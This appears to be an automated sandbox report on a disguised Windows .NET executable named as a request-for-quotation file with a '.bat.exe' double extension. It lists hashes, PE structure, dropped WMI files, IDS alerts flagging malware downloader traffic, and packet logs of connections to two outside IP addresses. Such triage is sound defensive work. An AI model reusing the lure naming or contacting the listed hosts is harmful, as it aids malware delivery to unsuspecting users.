                                                                                                                      SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                                                                                                                      Malicious:false
                                                                                                                      Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai
                                                                                                                      Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):48786
                                                                                                                      Entropy (8bit):3.5854495362228453
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
                                                                                                                      MD5:DF877BEC5C9E3382E94FEA48FEE049AC
                                                                                                                      SHA1:1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
                                                                                                                      SHA-256:7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
                                                                                                                      SHA-512:433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
                                                                                                                      Malicious:false
                                                                                                                      Preview:.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.
                                                                                                                      Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3444
                                                                                                                      Entropy (8bit):5.011954215267298
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                                                                                                                      MD5:B133A676D139032A27DE3D9619E70091
                                                                                                                      SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                                                                                                                      SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                                                                                                                      SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                                                                                                                      Malicious:false
                                                                                                                      Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai
                                                                                                                      Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):48786
                                                                                                                      Entropy (8bit):3.5854495362228453
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
                                                                                                                      MD5:DF877BEC5C9E3382E94FEA48FEE049AC
                                                                                                                      SHA1:1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
                                                                                                                      SHA-256:7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
                                                                                                                      SHA-512:433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
                                                                                                                      Malicious:false
                                                                                                                      Preview:.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.
                                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Entropy (8bit):7.548057359158885
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                      File name:Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                                                                                                                      File size:1'017'856 bytes
                                                                                                                      MD5:1ae7a890014eba9c807c6adeabac7671
                                                                                                                      SHA1:e3b92645849a3e064d9fc401badf115dab013839
                                                                                                                      SHA256:bba1825bd893328442cb891a35420a5da41a5431d1ade643f085c5992e763d3a
                                                                                                                      SHA512:3a54469caeb4052cb4b842b30292e5ae00c9bf2a29f0d293d975d7bd0283d657c2fb4c9fd0df0797782eda78474a9eab5f8fa6d1ff66ceaf59f00e128fbab2d7
                                                                                                                      SSDEEP:24576:Yij0gzjizxWgioJqE9p9jzOtXGnwaEalbcHNGtAlUDRL:1zjkW2H9p9PmXMOHNzUDB
                                                                                                                      TLSH:D925BF20B7F89D67E27AA1F3EBC4821057BAD545757BE7AA0CC564CE25C27320383927
                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....>g..............0..^...(.......|... ........@.. ....................................@................................
                                                                                                                      Icon Hash:130b253d1931012d
                                                                                                                      Entrypoint:0x4f7c2e
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x673E8DF5 [Thu Nov 21 01:33:41 2024 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:4
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:4
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:4
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                      Instruction
                                                                                                                      jmp dword ptr [00402000h]
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xf7bdc0x4f.text
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xf80000x2588.rsrc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xfc0000xc.reloc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                      .text0x20000xf5c340xf5e00d52324750f96cb1b1ed75d70456aab15False0.7465852583248602data7.5503065152862066IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                      .rsrc0xf80000x25880x2600b36adde2e372c2203bbf5ed3bc6bf6b1False0.8752055921052632data7.577022284364793IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .reloc0xfc0000xc0x200c20688910df94681c6dbcd844ad9a7daFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                      RT_ICON0xf81000x2016PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9504504504504504
                                                                                                                      RT_GROUP_ICON0xfa1280x14data1.05
                                                                                                                      RT_VERSION0xfa14c0x23cdata0.47027972027972026
                                                                                                                      RT_MANIFEST0xfa3980x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                                      DLLImport
                                                                                                                      mscoree.dll_CorExeMain
                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                      2024-11-21T12:20:12.874125+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949720193.122.6.16880TCP
                                                                                                                      2024-11-21T12:20:15.264721+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949720193.122.6.16880TCP
                                                                                                                      2024-11-21T12:20:16.938410+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949734188.114.97.3443TCP
                                                                                                                      2024-11-21T12:20:18.108479+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949740193.122.6.16880TCP
                                                                                                                      2024-11-21T12:20:18.467840+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949741193.122.6.16880TCP
                                                                                                                      2024-11-21T12:20:20.211067+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949748188.114.97.3443TCP
                                                                                                                      2024-11-21T12:20:20.467892+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949740193.122.6.16880TCP
                                                                                                                      2024-11-21T12:20:21.655388+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949749193.122.6.16880TCP
                                                                                                                      2024-11-21T12:20:22.138040+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949751188.114.97.3443TCP
                                                                                                                      2024-11-21T12:20:23.624113+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949757193.122.6.16880TCP
                                                                                                                      2024-11-21T12:20:25.348486+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949764188.114.97.3443TCP
                                                                                                                      2024-11-21T12:20:26.637765+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949767188.114.97.3443TCP
                                                                                                                      2024-11-21T12:20:28.506892+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949775188.114.97.3443TCP
                                                                                                                      2024-11-21T12:20:34.843367+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949797188.114.97.3443TCP
                                                                                                                      2024-11-21T12:20:37.955589+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949806188.114.97.3443TCP
                                                                                                                      2024-11-21T12:20:44.227515+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949828188.114.97.3443TCP
                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Nov 21, 2024 12:20:10.819808960 CET4972080192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:10.944809914 CET8049720193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:10.944937944 CET4972080192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:10.945334911 CET4972080192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:11.123337984 CET8049720193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:12.316953897 CET8049720193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:12.348850012 CET4972080192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:12.468478918 CET8049720193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:12.764905930 CET8049720193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:12.874125004 CET4972080192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:13.062580109 CET49727443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:13.062635899 CET44349727188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:13.062730074 CET49727443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:13.072967052 CET49727443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:13.073004961 CET44349727188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:14.336358070 CET44349727188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:14.336424112 CET49727443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:14.339795113 CET49727443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:14.339808941 CET44349727188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:14.343808889 CET44349727188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:14.399410009 CET49727443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:14.443325043 CET44349727188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:14.790524960 CET44349727188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:14.790584087 CET44349727188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:14.791111946 CET49727443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:14.796613932 CET49727443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:14.800216913 CET4972080192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:14.920037031 CET8049720193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:15.215023041 CET8049720193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:15.217988968 CET49734443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:15.218033075 CET44349734188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:15.218097925 CET49734443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:15.218455076 CET49734443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:15.218461990 CET44349734188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:15.264720917 CET4972080192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:16.269804955 CET4974080192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:16.389267921 CET8049740193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:16.389456034 CET4974080192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:16.389971972 CET4974080192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:16.482686043 CET44349734188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:16.485157013 CET49734443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:16.485182047 CET44349734188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:16.509829998 CET8049740193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:16.938431025 CET44349734188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:16.938534021 CET44349734188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:16.938819885 CET49734443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:16.939109087 CET49734443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:16.943092108 CET4972080192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:16.944828987 CET4974180192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:17.063242912 CET8049720193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:17.063344955 CET4972080192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:17.064376116 CET8049741193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:17.064451933 CET4974180192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:17.064600945 CET4974180192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:17.186301947 CET8049741193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:17.657229900 CET8049740193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:17.661041021 CET4974080192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:17.780663967 CET8049740193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:18.065586090 CET8049740193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:18.108479023 CET4974080192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:18.115283966 CET49742443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:18.115323067 CET44349742188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:18.115386009 CET49742443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:18.119646072 CET49742443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:18.119653940 CET44349742188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:18.424809933 CET8049741193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:18.433665991 CET49748443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:18.433693886 CET44349748188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:18.433795929 CET49748443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:18.434091091 CET49748443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:18.434099913 CET44349748188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:18.467839956 CET4974180192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:19.427109957 CET44349742188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:19.427203894 CET49742443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:19.428699970 CET49742443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:19.428720951 CET44349742188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:19.429049015 CET44349742188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:19.483500004 CET49742443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:19.493510962 CET49742443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:19.535351992 CET44349742188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:19.738532066 CET44349748188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:19.740494013 CET49748443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:19.740518093 CET44349748188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:20.006740093 CET44349742188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:20.006805897 CET44349742188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:20.006966114 CET49742443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:20.012706041 CET49742443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:20.016134024 CET4974080192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:20.135601997 CET8049740193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:20.211163044 CET44349748188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:20.211343050 CET44349748188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:20.211399078 CET49748443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:20.211837053 CET49748443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:20.216088057 CET4974180192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:20.217299938 CET4974980192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:20.335922956 CET8049741193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:20.335999012 CET4974180192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:20.336894035 CET8049749193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:20.336976051 CET4974980192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:20.337147951 CET4974980192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:20.421189070 CET8049740193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:20.423805952 CET49751443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:20.423846960 CET44349751188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:20.424002886 CET49751443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:20.424294949 CET49751443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:20.424316883 CET44349751188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:20.456554890 CET8049749193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:20.467891932 CET4974080192.168.2.9193.122.6.168
                                                                                                                      Nov 21, 2024 12:20:21.602137089 CET8049749193.122.6.168192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:21.603560925 CET49756443192.168.2.9188.114.97.3
                                                                                                                      Nov 21, 2024 12:20:21.603671074 CET44349756188.114.97.3192.168.2.9
                                                                                                                      Nov 21, 2024 12:20:21.603744984 CET49756443192.168.2.9188.114.97.3
